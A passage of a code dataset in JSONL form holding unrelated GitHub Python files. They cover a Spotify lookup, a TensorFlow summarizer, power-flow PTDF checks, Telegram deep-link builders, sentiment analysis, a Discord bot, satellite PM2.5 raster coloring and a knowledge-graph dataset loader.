\"&type=album&market=us&limit=1\"\n try:\n r = json.loads(requests.get(url, access_token).content.decode('utf-8'))\n name = r['albums']['items'][0]['name']\n year = r['albums']['items'][0]['release_date'].split('-')[0]\n artist = r['albums']['items'][0]['artists'][0]['name']\n tracks = r['albums']['items'][0]['total_tracks']\n return [name, year, artist, tracks]\n except:\n return [\"Token Inválido\"]\n","repo_name":"tiagoffmr/ADII","sub_path":"server/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69803604807","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport numpy as np\nimport tensorflow as tf\n\nfrom base import Model\nfrom utils import progress\nfrom sentenceEncorder import sentenceEncorder\n\nclass sentenceExtractor(Model):\n def __init__(self, sess, word_vocab_size, decoder_inputs, batch_size=20,\n rnn_size=650, layer_depth=1, word_embed_dim=150,\n feature_maps=[10, 20, 30, 60, 60, 60, 60], kernels=[1,2,3,4,5,6,7],\n max_grad_norm=5, dropout_prob=0.5):\n\n self.dropout_prob = dropout_prob\n self.data_dir = \"data\"\n self.dataset_name = \"mitei\"\n self.checkpoint_dir = \"checkpoint\"\n self.batch_size = batch_size\n self.seq_length = 60 # length of sequence\n self.decoder_inputs = decoder_inputs\n\n # RNN\n self.sess = sess\n self.rnn_size = rnn_size\n self.layer_depth = layer_depth\n self.num_decoder_symbols = 2\n\n # CNN\n self.word_vocab_size = word_vocab_size\n self.word_embed_dim = word_embed_dim\n self.feature_maps = feature_maps\n self.kernels = kernels\n\n # data_loading\n # self.loader = BatchLoader()\n\n def prepare_model(self):\n with tf.variable_scope(\"sentenceExtractor\"):\n self.word_inputs = tf.placeholder(tf.int32, [self.batch_size, self.seq_length])\n self.decoder_inputs = []\n\n with tf.variable_scope(\"embedding\") as scope:\n embedding_W = tf.get_variable(\"word_embedding\", [self.word_vocab_size, self.word_embed_dim])\n self.embedded_word = tf.nn.embedding_lookup(W, self.word_inputs)\n # word2vec?\n\n self.cnn_outputs = []\n\n with tf.variable_scope(\"sentenceEncorder\") as scope:\n word_indices = tf.split(1, self.seq_length, tf.expand_dims(self.word_inputs, -1))\n for idx in xrange(self.seq_length):\n word_index = tf.reshape(word_indices[idx], [-1, 1])\n if idx != 0:\n scope.reuse_variables()\n\n word_cnn = sentenceEncorder(self.embedded_word, self.word_embed_dim, self.feature_maps, self.kernels)\n cnn_output = word_cnn.output\n self.cnn_outputs.append(cnn_output)\n\n #######################################################################\n #bn = batch_norm()\n #norm_output = bn(tf.expand_dims(tf.expand_dims(cnn_output, 1), 1))\n #cnn_output = tf.squeeze(norm_output)\n #self.cnn_outputs.append(cnn_output)\n #######################################################################\n\n # ... #\n with tf.variable_scope(\"LSTM\") as scope:\n self.cell = tf.nn.rnn_cell.BasicLSTMCell(self.rnn_size)\n self.stacked_cell = tf.nn.rnn_cell.MultiRNNCell([self.cell] * self.layer_depth)\n outputs, _ = tf.nn.seq2seq.embedding_attention_seq2seq(self.cnn_outputs,\n self.decoder_inputs,\n self.cell,\n vocabulary_size,\n self.num_decoder_symbols,\n 300, # size of cnn_output\n feed_previous=feed_previous)\n\n self.lstm_outputs = []\n self.true_outputs = tf.placeholder(tf.int64,[self.batch_size, self.seq_length])\n true_outputs = tf.split(1, self.seq_length, self.true_outputs)\n\n loss = 0\n\n for idx, (top_h, true_output) in enumerate(zip(outputs, true_outputs)):\n top_h = tf.nn.dropout(top_h, self.dropout_prob)\n self.lstm_outputs.append(top_h)\n loss += tf.nn.sparse_softmax_cross_entropy_with_logits(self.lstm_outputs[idx], tf.squeeze(true_output))\n\n self.loss = tf.reduce_mean(loss) / self.seq_length\n tf.scalar_summary(\"loss\", self.loss)\n\ndef train(self, epoch):\n cost = 0\n target = np.zeros([self.batch_size, self.seq_length])\n N = self.loader.sizes[0]\n for idx in xrange(N):\n target.fill(0)\n x, y, x_char = self.loader.next_batch(0)\n for b in xrange(self.batch_size):\n for t, w in enumerate(y[b]):\n target[b][t] = w\n\n feed_dict = {\n self.word_inputs: x,\n self.char_inputs: x_char,\n self.true_outputs: target,\n }\n\n _, loss, step, summary_str = self.sess.run(\n [self.optim, self.loss, self.global_step, self.merged_summary], feed_dict=feed_dict)\n\n self.writer.add_summary(summary_str, step)\n\n if idx % 50 == 0:\n progress(idx/N, \"epoch: [%2d] [%4d/%4d] loss: %2.6f\" % (epoch, idx, N, loss))\n\n cost += loss\n\n return cost / N\n","repo_name":"danhper/deepsentence","sub_path":"deep_sentence/summarizer/models/extractive/sentenceExtractor.py","file_name":"sentenceExtractor.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"44133181124","text":"import pandas as pd\r\nfrom Case import system_input\r\n\r\n\r\n# Defines a function that returns the minimum quantity of power that can be exchanged between an offer bus and a request bus, without leading to congestions\r\n\r\ndef PTDF_check(SetPoint, Quantity, offer_bus, request_bus):\r\n k = 0\r\n m = 0\r\n epsilon = 0.00001 # Tolerance\r\n\r\n data = system_input(SetPoint)\r\n nodes = data['nodes'] # index for nodes\r\n lines = data['lines'] # index for lines\r\n lines_cstr = data['lines_cstr'] # index for constrained lines\r\n\r\n PTDF = pd.read_csv('PTDF.csv', names=nodes) # Retrieve PTDFs from a csv file, name columns after the nodes\r\n PTDF['Line'] = lines # Name rows after the lines\r\n PTDF.set_index('Line', inplace=True) # Change the index to be the line names\r\n\r\n # Initial state\r\n Pl_flow = [] # List for the line flows\r\n Pl_max_pos = [] # List for the maximum variation of the line flows in the same direction\r\n Pl_max_neg = [] # List for the maximum variation of the line flows in the other direction\r\n\r\n for l in lines_cstr: # Calculate power flow in each line\r\n Pl = 0\r\n for i in nodes:\r\n Pl += PTDF.loc[l, i] * (data[i]['SetPoint']) # Calculate the power flow in the line by adding the contribution of each bus\r\n if abs(Pl) > (data[l]['lineCapacity'] + epsilon): # Make sure that the initial power flows are feasible\r\n print('The initial dispatch is not feasible ({})'.format(l))\r\n Pl_max_pos.append(data[l]['lineCapacity'] - Pl) # Calculate the maximum variation of the power flow in the same direction for this line\r\n Pl_max_neg.append(-data[l]['lineCapacity'] - Pl) # Calculate the maximum variation of the power flow with a change of direction for this line\r\n Pl_flow.append(Pl)\r\n\r\n # Define the proper buses depending on the direction of the bids\r\n\r\n k = nodes[offer_bus]\r\n m = nodes[request_bus]\r\n\r\n # Update the quantity to make sure that the line flows are all feasible\r\n for l in lines_cstr:\r\n x = lines_cstr.index(l)\r\n\r\n PTDF_diff = - (PTDF.loc[l, k] - PTDF.loc[l, m])\r\n # First calculate the maximum power flow change in the line Pl_max\r\n if PTDF_diff > epsilon: # If the power is flowing in the same direction\r\n Pl_max = max(Pl_max_pos[x], 0)\r\n elif PTDF_diff < -epsilon: # If the power is flowing in the other direction\r\n Pl_max = min(Pl_max_neg[x], 0)\r\n # Then update the quantity\r\n if PTDF_diff > epsilon or PTDF_diff < -epsilon: # The difference between the two PTDFs is not equal to zero\r\n if Pl_max / PTDF_diff < Quantity: # If the quantity is bigger than the max for this line, update it to be equal to the max for this line\r\n Quantity = Pl_max / PTDF_diff\r\n Quantity = round(Quantity, 3)\r\n if Quantity == 0:\r\n return Quantity, 1 #returns 1 if is possible to tranfer energy\r\n else:\r\n return Quantity, 0 #returns 0 if it's not possible to tranfer energy\r\n\r\n\r\n\r\n","repo_name":"steliosiv/Continuous-Energy-Market-for-flexibility-using-renewable-energy","sub_path":"code/PTDF.py","file_name":"PTDF.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"15588811030","text":"from tkinter import *\nfrom tkinter import filedialog\nimport os\n\n\n# my function to load file\ndef callback():\n root.filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Select file\",\n filetypes=((\"jpeg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\n v.set(str(root.filename))\n\n\n# initialize my window\nroot = Tk()\nglobal v\nroot.title(\"Dimo\")\nroot.minsize(490, 500)\nroot.geometry(\"490x500\")\n\n# top frame\ntopFrame = Frame(root)\ntopFrame.pack()\n\n# bottom frame\nbottomFrame = Frame(root)\nbottomFrame.pack(side=BOTTOM)\n\nv = StringVar()\n\n\n\n# my widgets\nwelcome = Label(topFrame, text=\"Welcome to IDS\")\nb1 = Button(topFrame, text=\"Load File\", command=callback)\nb2 = Button(bottomFrame, text=\"Start\")\nfileName = Label(topFrame, textvariable=v)\nfiledir = Label(root, text=\"File Directory\")\nimg = PhotoImage(file=\"12.gif\")\npanel = Label(topFrame, image=img)\npanel.pack(side=\"top\", fill=\"both\", expand=\"yes\")\n\nwelcome.pack()\nb1.pack()\nb2.pack()\nfileName.pack()\n\n\nroot.mainloop()\n","repo_name":"MostafaSlaam/Dimo_GP","sub_path":"v.py","file_name":"v.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30297919330","text":"from typing import Optional, Any, Iterable\nfrom urllib.parse import urlencode\n\nfrom telebox.utils.not_set import NOT_SET\n\n\ndef get_username_link(username: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username\n }\n )\n else:\n return f\"t.me/{username}\"\n\n\ndef get_phone_number_link(number: str, *, with_tg: bool = False) -> str:\n number = number.lstrip(\"+\")\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"phone\": number\n }\n )\n else:\n return f\"t.me/+{number}\"\n\n\ndef get_chat_invite_link(hash_: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://join\",\n parameters={\n \"invite\": hash_\n }\n )\n else:\n return f\"t.me/+{hash_}\"\n\n\ndef get_message_public_link(username: str, message_id: int, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"post\": message_id\n }\n )\n else:\n return f\"t.me/{username}/{message_id}\"\n\n\ndef get_message_private_link(chat_id: int, message_id: int, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://privatepost\",\n parameters={\n \"channel\": chat_id,\n \"post\": message_id\n }\n )\n else:\n return f\"t.me/c/{chat_id}/{message_id}\"\n\n\ndef get_share_link(url: str, text: Optional[str] = None, *, with_tg: bool = False) -> str:\n return _get_parametrized_link(\n \"tg://msg_url\" if with_tg else \"t.me/share\",\n parameters={\n \"url\": url,\n \"text\": text\n }\n )\n\n\ndef get_video_chat_link(\n username: str,\n invite_hash: Optional[str] = None,\n *,\n with_tg: bool = False\n) -> str:\n video_chat_value = NOT_SET if invite_hash is None else invite_hash\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"videochat\": video_chat_value\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"videochat\": video_chat_value\n }\n )\n\n\ndef get_livestream_link(\n username: str,\n invite_hash: Optional[str] = None,\n *,\n with_tg: bool = False\n) -> str:\n livestream_value = NOT_SET if invite_hash is None else invite_hash\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"livestream\": livestream_value\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"livestream\": livestream_value\n }\n )\n\n\ndef get_voice_chat_link(\n username: str,\n invite_hash: Optional[str] = None,\n *,\n with_tg: bool = False\n) -> str:\n voice_chat_value = NOT_SET if invite_hash is None else invite_hash\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"voicechat\": voice_chat_value\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"voicechat\": voice_chat_value\n }\n )\n\n\ndef get_add_stickers_link(name: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://addstickers\",\n parameters={\n \"set\": name\n }\n )\n else:\n return f\"t.me/addstickers/{name}\"\n\n\ndef get_add_emoji_link(name: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://addemoji\",\n parameters={\n \"set\": name\n }\n )\n else:\n return f\"t.me/addemoji/{name}\"\n\n\ndef get_mtproxy_link(host: str, port: int, secret: str, *, with_tg: bool = False) -> str:\n return _get_parametrized_link(\n \"tg://proxy\" if with_tg else \"t.me/proxy\",\n parameters={\n \"server\": host,\n \"port\": port,\n \"secret\": secret\n }\n )\n\n\ndef get_socks5_proxy_link(\n host: str,\n port: int,\n username: Optional[str] = None,\n password: Optional[str] = None,\n *,\n with_tg: bool = False\n) -> str:\n return _get_parametrized_link(\n \"tg://socks\" if with_tg else \"t.me/socks\",\n parameters={\n \"server\": host,\n \"port\": port,\n \"user\": username,\n \"pass\": password\n }\n )\n\n\ndef get_add_theme_link(name: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://addtheme\",\n parameters={\n \"slug\": name\n }\n )\n else:\n return f\"t.me/addtheme/{name}\"\n\n\ndef get_bot_link(username: str, payload: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"start\": payload\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"start\": payload\n }\n )\n\n\ndef get_group_bot_link(\n username: str,\n payload: Optional[str] = None,\n admin_rights: Optional[Iterable[str]] = None,\n *,\n with_tg: bool = False\n) -> str:\n payload_value = NOT_SET if payload is None else payload\n admin_value = \"+\".join(admin_rights) if admin_rights is not None else None\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"startgroup\": payload_value,\n \"admin\": admin_value\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"startgroup\": payload_value,\n \"admin\": admin_value\n }\n )\n\n\ndef get_channel_bot_link(\n username: str,\n admin_rights: Iterable[str],\n *,\n with_tg: bool = False\n) -> str:\n admin_value = \"+\".join(admin_rights)\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"startchannel\": NOT_SET,\n \"admin\": admin_value\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"startchannel\": NOT_SET,\n \"admin\": admin_value\n }\n )\n\n\ndef get_game_link(username: str, name: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"game\": name\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"game\": name\n }\n )\n\n\ndef get_user_link(id_: int) -> str:\n return _get_parametrized_link(\n \"tg://user\",\n parameters={\n \"id\": id_\n }\n )\n\n\ndef _get_parametrized_link(uri: str, parameters: dict[str, Any]) -> str:\n value_parameters = {}\n no_value_parameters = []\n\n for name, value in parameters.items():\n if value is NOT_SET:\n no_value_parameters.append(name)\n elif value is not None:\n value_parameters[name] = value\n\n link = uri\n\n if value_parameters or no_value_parameters:\n link += \"?\"\n\n if value_parameters:\n link += urlencode(value_parameters, encoding=\"UTF-8\")\n\n if no_value_parameters:\n link += \"&\" + \"&\".join(no_value_parameters)\n elif no_value_parameters:\n link += \"&\".join(no_value_parameters)\n\n return link\n","repo_name":"Abstract-X/telebox","sub_path":"telebox/bot/utils/deep_links.py","file_name":"deep_links.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"6134079633","text":"from flask import Flask, request\nfrom pymongo import MongoClient\nfrom errorHandler import jsonErrorHandler\nfrom bson import json_util, ObjectId\nfrom check import listMessages, listMessagesUser, listAllUsers, changeId\nimport json\nimport nltk\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport pandas as pd\nfrom scipy.spatial.distance import pdist, squareform\n\n#Connect to DB\nclient = MongoClient(\"mongodb://localhost:27017\")\nmydb = client[\"sentiment\"]\n\n#NLTK\nnltk.download('vader_lexicon')\nsia = SentimentIntensityAnalyzer()\n\n\ndef analyzeResult(chat_id):\n #Analyze the sentiment of each chat message independently\n all_messages = listMessages(chat_id)\n result_analyze = []\n for i in all_messages:\n score = sia.polarity_scores(i['text'])\n result_analyze.append((i['user_id']['$oid'],score))\n return result_analyze\n\n\ndef analyzeAllResult(chat_id):\n #Analyze the sentiment of all chat messages\n all_messages = listMessages(chat_id)\n total_score = {'id': chat_id,'neg': 0.0, 'neu': 0.0, 'pos': 0.0}\n for i in all_messages:\n score = sia.polarity_scores(i['text'])\n total_score['neg'] += score['neg']\n total_score['pos'] += score['pos']\n total_score['neu'] += score['neu']\n return total_score\n\n\ndef analyzeResultUser(chat_id, user_id):\n #Analyze the sentiment of all chat messages for especific user\n all_messages = listMessagesUser(chat_id, user_id)\n total_score = {'user_id': user_id, \"chat_id\": chat_id, 'neg': 0.0, 'neu': 0.0, 'pos': 0.0}\n for i in all_messages:\n score = sia.polarity_scores(i['text'])\n total_score['neg'] += score['neg']\n total_score['pos'] += score['pos']\n total_score['neu'] += score['neu']\n return total_score\n\n\ndef analyzeUsers(chat_id):\n #Analyze the sentiment for all users in a chat\n all_users = listAllUsers(chat_id)\n all_scores = []\n for i in all_users:\n for j in i['users_ids']:\n score = analyzeResultUser(chat_id, j['$oid'])\n all_scores.append(score)\n return all_scores\n\n\ndef analyzeRecommendUsers(user_id, chat_id):\n #Analyze the sentiment for all users in a chat and return 3 user recommendation\n scores = analyzeUsers(chat_id)\n df = pd.DataFrame(scores).set_index('user_id')\n df = df.drop(columns =['chat_id'])\n df = pd.pivot_table(df, index='user_id')\n distances = pd.DataFrame(1/(1 + squareform(pdist(df, 'euclidean'))), \n index=df.index, columns=df.index)\n for _ in distances:\n similarities = distances[user_id].sort_values(ascending=False)[1:4]\n recommend = list(similarities.index)\n recommend = json.loads(json_util.dumps(recommend))\n recommend = changeId(recommend)\n return recommend\n","repo_name":"IvanDGregor/Sentiment-Analysis","sub_path":"src/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14478787816","text":"\"\"\"\nThis is the code for the bot.\nEdit the file for adding more commands/customizing the bot.\n\"\"\"\n\nimport os\nimport nextcord\nfrom nextcord.ext import commands, ipc\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nclass BotClass(commands.Bot):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.ipc_server = ipc.Server(self, secret_key=\"Hercules\")\n\n async def on_ready(self):\n \"\"\"Called upon the bot is ready to use\"\"\"\n print(\"Bot is ready\")\n\n async def on_ipc_ready(self):\n \"\"\"Called upon the ipc server is ready to use\"\"\"\n print(\"The ipc server is ready\")\n\n async def on_ipc_error(self, endpoint, error):\n \"\"\"Called upon the endpoint raises an error\"\"\"\n print(f\"{error} was raised by {endpoint}\")\n\n# if you use slash commands then change whatever needed, don't remove anything except the command prefix\nbot = BotClass(command_prefix=\"!\", intents=nextcord.Intents.all())\n\n@bot.ipc_server.route()\nasync def get_guild_count(data):\n guild_count = len(bot.guilds)\n return guild_count\n\n@bot.ipc_server.route()\nasync def get_guild_ids(data):\n guild_ids = [int(guild.id) for guild in bot.guilds]\n return guild_ids\n\n@bot.command()\nasync def test(ctx):\n \"\"\"\n This command is not necessary, you can remove this command and \n add whatever command you need.\n \"\"\"\n await ctx.reply(\"Everything is working perfectly\")\n\nif __name__ == \"__main__\":\n bot.ipc_server.start()\n bot.run(os.getenv(\"BOT_TOKEN\"))","repo_name":"D34ThGamer/XyRic_Bot_Dashboard","sub_path":"XyRic Bot Dashboard/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9335298091","text":"# 栅格分级赋色处理用于展示\r\nimport os\r\nimport numpy as np\r\nimport rasterio\r\nfrom rasterio.warp import calculate_default_transform, reproject, Resampling\r\n\r\n\r\ndef reclass_coloring(src_path, dst_path, reform_dic):\r\n with rasterio.open(src_path) as src:\r\n src_arr = src.read(1)\r\n meta = src.meta\r\n threshold = reform_dic['threshold']\r\n dst_value = reform_dic['dst_value']\r\n color_map = reform_dic['color_map']\r\n # reclass\r\n if len(threshold) != len(dst_value):\r\n print('the input out_value do not match threshold!')\r\n return\r\n dst_arr = src_arr.copy()\r\n for i in range(len(threshold)):\r\n if i != (len(threshold) - 1):\r\n dst_arr[(src_arr > threshold[i]) & (src_arr <= threshold[i + 1])] = dst_value[i]\r\n else:\r\n dst_arr[src_arr > threshold[i]] = dst_value[i]\r\n # coloring\r\n dst_arr[np.isnan(dst_arr)] = 0\r\n meta.update({'nodata': 0})\r\n meta.update({'dtype': 'uint8'})\r\n with rasterio.open(dst_path, 'w', **meta) as dst:\r\n dst_arr = dst_arr.astype('uint8')\r\n dst.write(dst_arr, indexes=1)\r\n dst.write_colormap(1, color_map)\r\n\r\n\r\ndef reproject2wgs84(src_path, dst_path):\r\n dataset = rasterio.open(src_path)\r\n dataread = dataset.read()\r\n dataread = dataread.astype('uint8')\r\n dst_crs = 'EPSG:4326'\r\n transform, width, height = calculate_default_transform(\r\n dataset.crs, dst_crs, dataset.width, dataset.height, *dataset.bounds)\r\n kwargs = dataset.profile.copy()\r\n kwargs.update({\r\n 'crs': dst_crs,\r\n 'transform': transform,\r\n 'width': width,\r\n 'height': height,\r\n 'dtype': rasterio.uint8,\r\n })\r\n with rasterio.open(dst_path, 'w', **kwargs) as dst:\r\n for i in range(1, dataset.count + 1):\r\n reproject(\r\n source=dataread[i - 1],\r\n destination=rasterio.band(dst, i),\r\n src_transform=dataset.transform,\r\n src_crs=dataset.crs,\r\n dst_transform=transform,\r\n dst_crs=dst_crs,\r\n resampling=Resampling.nearest)\r\n\r\n\r\nif __name__ == '__main__':\r\n # src_file = 'G:/VScodeProjects/air_pollution_surveillance/raster_process_for_display/air_pollution_pm2p5.tif'\r\n # reprojected_file = src_file.split('.')[0] + '_reprojected.tif'\r\n # dst_file = reprojected_file.split('.')[0] + '_color.tif'\r\n # reform_dic = {'threshold': [0, 35, 75, 115, 150, 250],\r\n # 'dst_value': [1, 2, 3, 4, 5, 6],\r\n # 'color_map': {\r\n # 1: (8, 8, 255),\r\n # 2: (59, 157, 255),\r\n # 3: (112, 255, 210),\r\n # 4: (231, 255, 74),\r\n # 5: (255, 166, 0),\r\n # 6: (255, 0, 0)}}\r\n # reproject2wgs84(src_file, reprojected_file)\r\n # reclass_coloring(reprojected_file, dst_file, reform_dic)\r\n\r\n # 以下代码为下载的H8pm2.5tif数据分级赋色\r\n # input_dir = 'F:/zsk/H8/demo/output/l4/China'\r\n # output_dir = 'F:/zsk/H8/demo/output/l4/China_color/color_2'\r\n\r\n # for d in os.listdir(input_dir):\r\n # d_dir = os.path.join(input_dir, d)\r\n # out_d_dir = os.path.join(output_dir, d)\r\n # if not os.path.exists(out_d_dir):\r\n # os.mkdir(out_d_dir)\r\n # for src_file in os.listdir(d_dir):\r\n # reprojected_name = src_file.split('.')[0] + '_reprojected.tif'\r\n # dst_name = reprojected_name.split('.')[0] + '_color.tif'\r\n # reprojected_file = os.path.join(out_d_dir, reprojected_name)\r\n # dst_file = os.path.join(out_d_dir, dst_name)\r\n # reform_dic = {'threshold': [0, 35, 75, 115, 150, 250],\r\n # 'dst_value': [1, 2, 3, 4, 5, 6],\r\n # 'color_map': {\r\n # 1: (0, 97, 0),\r\n # 2: (97, 153, 0),\r\n # 3: (197, 219, 0),\r\n # 4: (255, 217, 0),\r\n # 5: (255, 132, 0),\r\n # 6: (255, 38, 0)}}\r\n # src_file_path = os.path.join(d_dir, src_file)\r\n # # reproject2wgs84(src_file_path, reprojected_file)\r\n # reclass_coloring(src_file_path, dst_file, reform_dic)\r\n\r\n db_tif_dir = 'F:/zsk/H8/demo/db/black_tif'\r\n output_dir = 'F:/zsk/H8/demo/db/color_tif/color_2'\r\n\r\n for day in os.listdir(db_tif_dir):\r\n day_dir = os.path.join(db_tif_dir, day)\r\n out_day_dir = os.path.join(output_dir, day)\r\n if not os.path.exists(out_day_dir):\r\n os.mkdir(out_day_dir)\r\n for f in os.listdir(day_dir):\r\n if f.endswith('.tif'):\r\n reprojected_file_name = f.split('.')[0] + '_reprojected.tif'\r\n dst_file_name = reprojected_file_name.split('.')[0] + '_color.tif'\r\n reform_dic = {'threshold': [0, 35, 75, 115, 150, 250],\r\n 'dst_value': [1, 2, 3, 4, 5, 6],\r\n 'color_map': {\r\n # 1: (40, 146, 199),\r\n # 2: (140, 184, 164),\r\n # 3: (215, 227, 125),\r\n # 4: (252, 207, 81),\r\n # 5: (247, 122, 45),\r\n # 6: (232, 21, 21)}}\r\n # 1: (0, 97, 0),\r\n 1: (0, 97, 0),\r\n 2: (97, 153, 0),\r\n 3: (197, 219, 0),\r\n 4: (255, 217, 0),\r\n 5: (255, 132, 0),\r\n 6: (255, 38, 0)}}\r\n src_file = os.path.join(day_dir, f)\r\n reprojected_file = os.path.join(out_day_dir, reprojected_file_name)\r\n dst_file = os.path.join(out_day_dir, dst_file_name)\r\n reproject2wgs84(src_file, reprojected_file)\r\n reclass_coloring(reprojected_file, dst_file, reform_dic)\r\n os.remove(reprojected_file)\r\n\r\n","repo_name":"ValarMorghulis12138/air_pollution_surveillance","sub_path":"raster_process_for_display/raster_process_for_dsiplay.py","file_name":"raster_process_for_dsiplay.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2908301763","text":"import json\nimport os\n\nimport torch\nfrom torch_geometric.data import Data, InMemoryDataset\nfrom torch_geometric.io import read_txt_array\nfrom torch_geometric.utils import sort_edge_index\n\n\nclass DBP15K(InMemoryDataset):\n def __init__(self, root, pair, KG_num=1, rate=0.3, seed=1):\n self.pair = pair\n self.KG_num = KG_num\n self.rate = rate\n self.seed = seed\n torch.manual_seed(seed)\n super(DBP15K, self).__init__(root)\n self.data, self.slices = torch.load(self.processed_paths[0])\n\n @property\n def raw_file_names(self):\n return ['zh_en', 'fr_en', 'ja_en']\n\n @property\n def processed_file_names(self):\n return '%s_%d_%.1f_%d.pt' % (self.pair, self.KG_num, self.rate, self.seed)\n\n def process(self):\n x1_path = os.path.join(self.root, self.pair, 'ent_ids_1')\n x2_path = os.path.join(self.root, self.pair, 'ent_ids_2')\n g1_path = os.path.join(self.root, self.pair, 'triples_1')\n g2_path = os.path.join(self.root, self.pair, 'triples_2')\n emb_path = os.path.join(self.root, self.pair, self.pair[:2] + '_vectorList.json')\n x1, edge_index1, rel1, assoc1 = self.process_graph(g1_path, x1_path, emb_path)\n x2, edge_index2, rel2, assoc2 = self.process_graph(g2_path, x2_path, emb_path)\n\n pair_path = os.path.join(self.root, self.pair, 'ref_ent_ids')\n pair_set = self.process_pair(pair_path, assoc1, assoc2)\n# pair_set = pair_set[:, torch.randperm(pair_set.size(1))]\n train_set = pair_set[:, :int(self.rate * pair_set.size(1))]\n test_set = pair_set[:, int(self.rate * pair_set.size(1)):]\n\n if self.KG_num == 1:\n data = Data(x1=x1, edge_index1=edge_index1, rel1=rel1,\n x2=x2, edge_index2=edge_index2, rel2=rel2,\n train_set=train_set.t(), test_set=test_set.t())\n else:\n x = torch.cat([x1, x2], dim=0)\n edge_index = torch.cat([edge_index1, edge_index2 + x1.size(0)], dim=1)\n rel = torch.cat([rel1, rel2 + rel1.max() + 1], dim=0)\n data = Data(x=x, edge_index=edge_index, rel=rel, train_set=train_set.t(), test_set=test_set.t())\n torch.save(self.collate([data]), self.processed_paths[0])\n\n def process_graph(self, triple_path, ent_path, emb_path):\n g = read_txt_array(triple_path, sep='\\t', dtype=torch.long)\n subj, rel, obj = g.t()\n\n assoc = torch.full((rel.max().item() + 1,), -1, dtype=torch.long)\n assoc[rel.unique()] = torch.arange(rel.unique().size(0))\n rel = assoc[rel]\n\n idx = []\n with open(ent_path, 'r') as f:\n for line in f:\n info = line.strip().split('\\t')\n idx.append(int(info[0]))\n idx = torch.tensor(idx)\n with open(emb_path, 'r', encoding='utf-8') as f:\n embedding_list = torch.tensor(json.load(f))\n x = embedding_list[idx]\n\n assoc = torch.full((idx.max().item() + 1,), -1, dtype=torch.long)\n assoc[idx] = torch.arange(idx.size(0))\n subj, obj = assoc[subj], assoc[obj] # map to [0, max_entity_count)\n edge_index = torch.stack([subj, obj], dim=0)\n edge_index, rel = sort_edge_index(edge_index, rel)\n print(edge_index.shape, rel.shape)\n return x, edge_index, rel, assoc\n\n def process_pair(self, path, assoc1, assoc2):\n e1, e2 = read_txt_array(path, sep='\\t', dtype=torch.long).t()\n return torch.stack([assoc1[e1], assoc2[e2]], dim=0)\n","repo_name":"LinXueyuanStdio/BGEA","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"26142374950","text":"class Solution:\n def stoneGameVII(self, stones: List[int]) -> int:\n n = len(stones)\n memo = [[-inf]*n for _ in range(n)]\n presum = [0] + list(accumulate(stones))\n \n @lru_cache(None)\n def dfs(l, r):\n if l > r: return 0\n if memo[l][r] != -inf: return memo[l][r]\n\n # alice = 